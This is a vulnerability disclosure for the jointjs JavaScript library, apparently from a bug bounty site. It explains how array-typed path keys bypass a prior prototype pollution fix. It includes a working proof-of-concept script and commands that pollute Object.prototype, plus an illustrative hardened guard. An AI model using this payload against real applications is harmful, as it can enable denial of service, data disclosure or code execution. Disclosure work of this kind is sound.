Prototype Pollution in clientio/joint
Valid
Reported on
Sep 5th 2021
✍️ Description
The jointjs package is vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of the fix for CVE-2020-28480 when the path components used in the path parameter are arrays. In particular, the condition key === "__proto__" returns false if key is ["__proto__"], because the === operator always returns false when the operands are of different types.
🕵️♂️ Proof of Concept
Create the following PoC file:
// poc.js
const jointjs = require("jointjs");
const obj = {};
console.log("Before : " + {}.polluted);
jointjs.util.setByPath(obj, [["__proto__"],'polluted'], 'Yes! Its Polluted',',');
console.log("After : " + {}.polluted);
Execute the following commands in the terminal:
npm i jointjs # Install affected module
node poc.js # Run the PoC
Check the Output:
Before : undefined
After : Yes! Its Polluted
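As an added illustration (not code from the jointjs project or from this report), the following hypothetical setByPath-style helper shows why a strict string comparison misses an array key and how a type-aware guard refuses the path used in the PoC above:

```javascript
// Added example, not jointjs code: a hypothetical setByPath-style helper
// that contrasts the bypassed check with a type-aware guard.
const FORBIDDEN_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// The check the advisory describes: strict equality against a string.
// ["__proto__"] === "__proto__" is false because the types differ, yet a
// property access obj[["__proto__"]] coerces the array to "__proto__".
function isForbiddenStrictEq(key) {
  return key === "__proto__";
}

// Hardened guard: only plain strings may be path segments, and the
// prototype-walking names are refused whatever their origin.
function isForbiddenKey(key) {
  if (typeof key !== "string") return true;
  return FORBIDDEN_KEYS.has(key);
}

// Accepts either a delimited string ("a/b/c") or an array of segments.
function toSegments(path, delim) {
  return Array.isArray(path) ? path : String(path).split(delim);
}

// Validates every segment before touching obj; returns false and mutates
// nothing when any segment is rejected, so the PoC path above is refused.
function safeSetByPath(obj, path, value, delim = "/") {
  const segments = toSegments(path, delim);
  if (segments.length === 0 || segments.some(isForbiddenKey)) return false;
  let cur = obj;
  for (let i = 0; i < segments.length - 1; i++) {
    const seg = segments[i];
    // Descend only into own object-valued properties; never walk inherited ones.
    const own = Object.prototype.hasOwnProperty.call(cur, seg);
    if (!own || typeof cur[seg] !== "object" || cur[seg] === null) {
      cur[seg] = {};
    }
    cur = cur[seg];
  }
  cur[segments[segments.length - 1]] = value;
  return true;
}

// Summary of the contrast: the array key slips past the strict comparison but
// not the guard, and the PoC path from this report is rejected outright.
function runDemo() {
  return {
    strictEqMisses: !isForbiddenStrictEq(["__proto__"]),
    guardRejects: isForbiddenKey(["__proto__"]),
    pocPathRefused: !safeSetByPath({}, [["__proto__"], "polluted"], "Yes! Its Polluted", ","),
  };
}
```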
💥 Impact
Depending on how the polluted properties are later used by the application, it may lead to Information Disclosure, DoS, or RCE.
We have contacted a member of the clientio/joint team and are waiting to hear back.
The fix bounty has been dropped
This vulnerability will not receive a CVE